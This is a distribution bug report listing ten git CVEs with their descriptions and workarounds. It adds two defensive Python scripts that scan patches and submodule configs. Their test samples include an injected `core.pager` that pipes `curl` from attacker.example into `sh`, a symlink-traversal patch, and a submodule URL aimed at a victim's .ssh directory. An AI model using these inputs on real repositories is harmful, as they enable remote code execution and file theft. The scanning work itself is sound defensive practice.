[Bugs] [Bug 13522] New: [CVE 21] git 2.35.2 CVEs found

bugzilla bugzilla at rosalinux.ru
Wed Aug 23 23:19:25 MSK 2023


https://bugzilla.rosalinux.ru/show_bug.cgi?id=13522

          Platform: 2021.1
            Bug ID: 13522
           Summary: [CVE 21] git 2.35.2 CVEs found
    Classification: ROSA-based products
           Product: ROSA Fresh
           Version: All
          Hardware: All
               URL: CVE-2022-23521, CVE-2022-29187, CVE-2022-31012,
                    CVE-2022-39253, CVE-2022-39260, CVE-2022-41903,
                    CVE-2023-22490, CVE-2023-23946, CVE-2023-25652,
                    CVE-2023-29007
                OS: Linux
            Status: CONFIRMED
          Severity: normal
          Priority: Normal
         Component: System (kernel, glibc, systemd, bash, PAM...)
          Assignee: bugs at lists.rosalinux.ru
          Reporter: y.tumanov at rosalinux.ru
        QA Contact: bugs at lists.rosalinux.ru
                CC: e.kosachev at rosalinux.ru, s.matveev at rosalinux.ru,
                    y.tumanov at rosalinux.ru
  Target Milestone: ---
             Flags: secteam_verified?

Please patch CVEs for package git version 2.35.2

INFO (CVEs are): git 2.35.2 CVEs found
CVE-2022-23521
Desc: Git is a distributed revision control system. gitattributes are a mechanism
to allow defining attributes for paths. These attributes can be defined by
adding a `.gitattributes` file to the repository, which contains a set of file
patterns and the attributes that should be set for paths matching this pattern.
When parsing gitattributes, multiple integer overflows can occur when there is
a huge number of path patterns, a huge number of attributes for a single
pattern, or when the declared attribute names are huge. These overflows can be
triggered via a crafted `.gitattributes` file that may be part of the commit
history. Git silently splits lines longer than 2KB when parsing gitattributes
from a file, but not when parsing them from the index. Consequently, the
failure mode depends on whether the file exists in the working tree, the index
or both. This integer overflow can result in arbitrary heap reads and writes,
which may result in remote code execution. The problem has been patched in the
versions published on 2023-01-17, going back to v2.30.7. Users are advised to
upgrade. There are no known workarounds for this issue.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-23521
Severity: CRITICAL
CVE-2022-29187
Desc: Git is a distributed revision control system. Git prior to versions
2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5, is
vulnerable to privilege escalation in all platforms. An unsuspecting user could
still be affected by the issue reported in CVE-2022-24765, for example when
navigating as root into a shared tmp directory that is owned by them, but where
an attacker could create a git repository. Versions 2.37.1, 2.36.2, 2.35.4,
2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 contain a patch for this issue. The
simplest way to avoid being affected by the exploit described in the example is
to avoid running git as root (or an Administrator in Windows), and if needed to
reduce its use to a minimum. While a generic workaround is not possible, a
system could be hardened from the exploit described in the example by removing
any such repository if it exists already and creating one as root to block any
future attacks.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-29187
Severity: HIGH
CVE-2022-31012
Desc: Git for Windows is a fork of Git that contains Windows-specific patches.
This vulnerability in versions prior to 2.37.1 lets Git for Windows' installer
execute a binary into `C:\mingw64\bin\git.exe` by mistake. This only happens
upon a fresh install, not when upgrading Git for Windows. A patch is included
in version 2.37.1. Two workarounds are available. Create the `C:\mingw64`
folder and remove read/write access from this folder, or disallow arbitrary
authenticated users to create folders in `C:\`.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-31012
Severity: HIGH
CVE-2022-39253
Desc: Git is an open source, scalable, distributed revision control system.
Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and
2.37.4 are subject to exposure of sensitive information to a malicious actor.
When performing a local clone (where the source and target of the clone are on
the same volume), Git copies the contents of the source's `$GIT_DIR/objects`
directory into the destination by either creating hardlinks to the source
contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A
malicious actor could convince a victim to clone a repository with a symbolic
link pointing at sensitive information on the victim's machine. This can be
done either by having the victim clone a malicious repository on the same
machine, or having them clone a malicious repository embedded as a bare
repository via a submodule from any source, provided they clone with the
`--recurse-submodules` option. Git does not create symbolic links in the
`$GIT_DIR/objects` directory. The problem has been patched in the versions
published on 2022-10-18, and backported to v2.30.x. Potential workarounds:
Avoid cloning untrusted repositories using the `--local` optimization when on a
shared machine, either by passing the `--no-local` option to `git clone` or
cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning
repositories from untrusted sources with `--recurse-submodules` or run `git
config --global protocol.file.allow user`.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-39253
Severity: MEDIUM
CVE-2022-39260
Desc: Git is an open source, scalable, distributed revision control system.
`git shell` is a restricted login shell that can be used to implement Git's
push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4,
2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the
command arguments into an array improperly uses an `int` to represent the
number of entries in the array, allowing a malicious actor to intentionally
overflow the return value, leading to arbitrary heap writes. Because the
resulting array is then passed to `execv()`, it is possible to leverage this
attack to gain remote code execution on a victim machine. Note that a victim
must first allow access to `git shell` as a login shell in order to be
vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5,
2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to
upgrade to the latest version. Disabling `git shell` access via remote logins
is a viable short-term workaround.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-39260
Severity: HIGH
CVE-2022-41903
Desc: Git is a distributed revision control system. `git log` can display commits
in an arbitrary format using its `--format` specifiers. This functionality is
also exposed to `git archive` via the `export-subst` gitattribute. When
processing the padding operators, there is an integer overflow in
`pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an
`int`, and then added as an offset to a `memcpy()`. This overflow can be
triggered directly by a user running a command which invokes the commit
formatting machinery (e.g., `git log --format=...`). It may also be triggered
indirectly through git archive via the export-subst mechanism, which expands
format specifiers inside of files within the repository during a git archive.
This integer overflow can result in arbitrary heap writes, which may result in
arbitrary code execution. The problem has been patched in the versions
published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade.
Users who are unable to upgrade should disable `git archive` in untrusted
repositories. If you expose git archive via `git daemon`, disable it by running
`git config --global daemon.uploadArch false`.
Link: https://nvd.nist.gov/vuln/detail/CVE-2022-41903
Severity: CRITICAL
CVE-2023-22490
Desc: Git is a revision control system. Using a specially-crafted repository,
Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7,
2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone
optimization even when using a non-local transport. Though Git will abort local
clones whose source `$GIT_DIR/objects` directory contains symbolic links, the
`objects` directory itself may still be a symbolic link. These two may be
combined to include arbitrary files based on known paths on the victim's
filesystem within the malicious repository's working copy, allowing for data
exfiltration in a similar manner as CVE-2022-39253. A fix has been prepared and
will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5, v2.35.7, v2.34.7, v2.33.7, v2.32.6,
v2.31.7 and v2.30.8. If upgrading is impractical, two short-term workarounds
are available. Avoid cloning repositories from untrusted sources with
`--recurse-submodules`. Instead, consider cloning repositories without
recursively cloning their submodules, and instead run `git submodule update` at
each layer. Before doing so, inspect each new `.gitmodules` file to ensure that
it does not contain suspicious module URLs.
Link: https://nvd.nist.gov/vuln/detail/CVE-2023-22490
Severity: MEDIUM
CVE-2023-23946
Desc: Git, a revision control system, is vulnerable to path traversal prior to
versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6,
2.31.7, and 2.30.8. By feeding a crafted input to `git apply`, a path outside
the working tree can be overwritten as the user who is running `git apply`. A
fix has been prepared and will appear in v2.39.2, v2.38.4, v2.37.6, v2.36.5,
v2.35.7, v2.34.7, v2.33.7, v2.32.6, v2.31.7, and v2.30.8. As a workaround, use
`git apply --stat` to inspect a patch before applying; avoid applying one that
creates a symbolic link and then creates a file beyond the symbolic link.
Link: https://nvd.nist.gov/vuln/detail/CVE-2023-23946
Severity: HIGH
CVE-2023-25652
Desc: Git is a revision control system. Prior to versions 2.30.9, 2.31.8,
2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, by
feeding specially crafted input to `git apply --reject`, a path outside the
working tree can be overwritten with partially controlled contents
(corresponding to the rejected hunk(s) from the given patch). A fix is
available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6,
2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid using `git apply`
with `--reject` when applying patches from an untrusted source. Use `git apply
--stat` to inspect a patch before applying; avoid applying one that creates a
conflict where a link corresponding to the `*.rej` file exists.
Link: https://nvd.nist.gov/vuln/detail/CVE-2023-25652
Severity: HIGH
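The workaround text for CVE-2023-23946 and CVE-2023-25652 above boils down to "inspect the patch before `git apply`". The following is an added example of such a pre-apply check, written for this report and not part of git itself: it walks a unified diff, records every path the patch turns into a symbolic link (mode 120000), and flags any later file that would be written beneath such a link, any path that escapes the working tree, and, for `--reject` use, any file whose `<path>.rej` already exists as a symlink in the working tree. The sample patch and the `tree_symlinks` argument are constructed inputs; in a real check you would enumerate the tree's symlinks with `os.path.islink()`.

```python
"""Pre-apply inspection of a unified diff, implementing the two workarounds
quoted above: refuse a patch that creates a symbolic link and then writes
a file beneath it (CVE-2023-23946), and, when the patch will be applied
with --reject, refuse one whose rejected hunks would land on an existing
symlink named <path>.rej (CVE-2023-25652). Added example, not git's code."""
import re
from typing import Iterable, List

DIFF_HEADER = re.compile(r'^diff --git a/(.+?) b/(.+)$')
MODE_LINE = re.compile(r'^new (?:file )?mode (\d{6})$')   # "new file mode" / "new mode"
SYMLINK_MODE = '120000'

# Constructed sample patch: the first hunk creates `link` as a symlink to /tmp,
# the second then "creates" link/evil.txt, which a vulnerable git apply would
# write to /tmp/evil.txt. The index hashes are made up.
SAMPLE_PATCH = """\
diff --git a/link b/link
new file mode 120000
index 0000000..1b8e0ec
--- /dev/null
+++ b/link
@@ -0,0 +1 @@
+/tmp
\\ No newline at end of file
diff --git a/link/evil.txt b/link/evil.txt
new file mode 100644
index 0000000..6b4e3b4
--- /dev/null
+++ b/link/evil.txt
@@ -0,0 +1 @@
+pwned
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1 +1,2 @@
 hello
+world
"""


def inspect_patch(text: str, tree_symlinks: Iterable[str] = ()) -> List[str]:
    """Return findings (an empty list means nothing suspicious).

    tree_symlinks: paths that are already symlinks in the working tree. It is
    constructed input here; in practice walk the tree with os.path.islink().
    """
    findings: List[str] = []
    symlinks = set(tree_symlinks)          # grows as the patch creates links
    current = None
    for line in text.splitlines():
        m = DIFF_HEADER.match(line)
        if m:
            current = m.group(2)
            parts = current.split('/')
            if current.startswith('/') or '..' in parts:
                findings.append(f"path escapes working tree: {current}")
            # A file written under a directory that is (or became) a symlink
            # ends up wherever the link points.
            for i in range(1, len(parts)):
                prefix = '/'.join(parts[:i])
                if prefix in symlinks:
                    findings.append(f"{current} would be written through symlink {prefix}")
                    break
            # --reject writes rejected hunks to <path>.rej, following a symlink there.
            if current + '.rej' in symlinks:
                findings.append(f"rejected hunks for {current} would follow symlink {current}.rej")
            continue
        mm = MODE_LINE.match(line)
        if mm and current is not None and mm.group(1) == SYMLINK_MODE:
            symlinks.add(current)
            findings.append(f"patch creates symlink: {current}")
    return findings


if __name__ == '__main__':
    for finding in inspect_patch(SAMPLE_PATCH):
        print('WARNING:', finding)
```

Run against the constructed patch this reports the symlink creation and the write through it; a plain content change to README.md produces nothing. It deliberately does not try to resolve where the link points: a symlink anywhere on the written path is reason enough to stop and read the patch by hand.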
CVE-2023-29007
Desc: Git is a revision control system. Prior to versions 2.30.9, 2.31.8,
2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a
specially crafted `.gitmodules` file with submodule URLs that are longer than
1024 characters can be used to exploit a bug in
`config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used
to inject arbitrary configuration into a user's `$GIT_DIR/config` when
attempting to remove the configuration section associated with that submodule.
When the attacker injects configuration values which specify executables to run
(such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to
a remote code execution. A fix is available in versions 2.30.9, 2.31.8,
2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As
a workaround, avoid running `git submodule deinit` on untrusted repositories or
without prior inspection of any submodule sections in `$GIT_DIR/config`.
Link: https://nvd.nist.gov/vuln/detail/CVE-2023-29007
Severity: HIGH
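Three of the entries above (CVE-2022-39253, CVE-2023-22490, CVE-2023-29007) end with the same advice: look at `.gitmodules` and at the submodule sections of `$GIT_DIR/config` before recursing or deinitialising. Below is an added example of that inspection, written for this report and not git's own code. It contains a minimal parser for git-config syntax (enough for the sample; git's quoting, includes and line continuations are out of scope), flags submodule URLs that would take the local-clone path (`file://` or a bare filesystem path), URLs longer than the 1024-character trigger named in the CVE-2023-29007 text, paths that escape the superproject, and the three executable-naming keys the description lists (`core.pager`, `core.editor`, `core.sshCommand`). The `.gitmodules` and config samples are constructed.

```python
"""Inspect a .gitmodules file and a repository's $GIT_DIR/config along the
lines of the workarounds quoted above: submodule URLs that use a local
transport (the --local clone path abused by CVE-2022-39253/CVE-2023-22490),
submodule URLs longer than 1024 characters (the trigger length named for
CVE-2023-29007), paths that escape the superproject, and config keys that
name an executable (core.pager, core.editor, core.sshCommand).
Added example, not git's own code."""
import re
from typing import List, Optional, Tuple

SECTION = re.compile(r'^\s*\[(\w+)(?:\s+"([^"]*)")?\]\s*$')
KEYVAL = re.compile(r'^\s*([\w-]+)\s*=\s*(.*?)\s*$')
REMOTE_SCHEME = re.compile(r'^(https?|ssh|git)://', re.I)
SCP_LIKE = re.compile(r'^[^/:]+:')          # host:path or user@host:path
URL_LIMIT = 1024                            # threshold from the CVE-2023-29007 text
EXEC_KEYS = {('core', 'pager'), ('core', 'editor'), ('core', 'sshcommand')}

Entry = Tuple[str, Optional[str], str, str]   # (section, subsection, key, value)


def parse_git_config(text: str) -> List[Entry]:
    """Minimal parser for git-config syntax (also used by .gitmodules).
    Handles [section], [section "sub"], key = value and # / ; comment lines."""
    entries: List[Entry] = []
    section: Optional[str] = None
    subsection: Optional[str] = None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(('#', ';')):
            continue
        m = SECTION.match(line)
        if m:
            section, subsection = m.group(1).lower(), m.group(2)
            continue
        kv = KEYVAL.match(line)
        if kv and section is not None:
            entries.append((section, subsection, kv.group(1).lower(), kv.group(2)))
    return entries


def is_local_url(url: str) -> bool:
    """True for file:// URLs and bare filesystem paths, i.e. anything that
    would make `git clone` take the local-clone optimization."""
    if url.lower().startswith('file://'):
        return True
    return not (REMOTE_SCHEME.match(url) or SCP_LIKE.match(url))


def inspect_gitmodules(text: str) -> List[str]:
    findings: List[str] = []
    for section, name, key, value in parse_git_config(text):
        if section != 'submodule':
            continue
        if key == 'url':
            if len(value) > URL_LIMIT:
                findings.append(f"{name}: url is {len(value)} chars (> {URL_LIMIT})")
            if is_local_url(value):
                findings.append(f"{name}: url uses a local transport: {value[:60]}")
        elif key == 'path':
            if value.startswith('/') or '..' in value.split('/'):
                findings.append(f"{name}: path escapes the superproject: {value}")
    return findings


def inspect_repo_config(text: str) -> List[str]:
    """Executable-naming keys that should not appear in a repo-level config
    you did not write yourself (the post-`submodule deinit` check)."""
    return [f"{s}.{k} = {v!r}" for s, _, k, v in parse_git_config(text)
            if (s, k) in EXEC_KEYS]


# Constructed samples: one benign submodule, one pointing at a local path,
# one with an over-long URL and an escaping path; and a $GIT_DIR/config
# into which a pager command has been injected.
SAMPLE_GITMODULES = """\
[submodule "vendor/libfoo"]
\tpath = vendor/libfoo
\turl = https://example.com/libfoo.git
[submodule "evil"]
\tpath = evil
\turl = file:///home/victim/.ssh
[submodule "long"]
\tpath = ../outside
\turl = https://example.com/""" + 'a' * 1100 + '\n'

SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = https://example.com/super.git
[core]
\tpager = sh -c 'curl http://attacker.example/x | sh'
"""

if __name__ == '__main__':
    for finding in inspect_gitmodules(SAMPLE_GITMODULES) + inspect_repo_config(SAMPLE_CONFIG):
        print('WARNING:', finding)
```

Run the `.gitmodules` check on each newly fetched layer before `git submodule update`, and the config check after any `git submodule deinit` on a repository you do not trust; a `core.pager` or `core.sshCommand` you did not set is the injected value the CVE-2023-29007 text describes.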
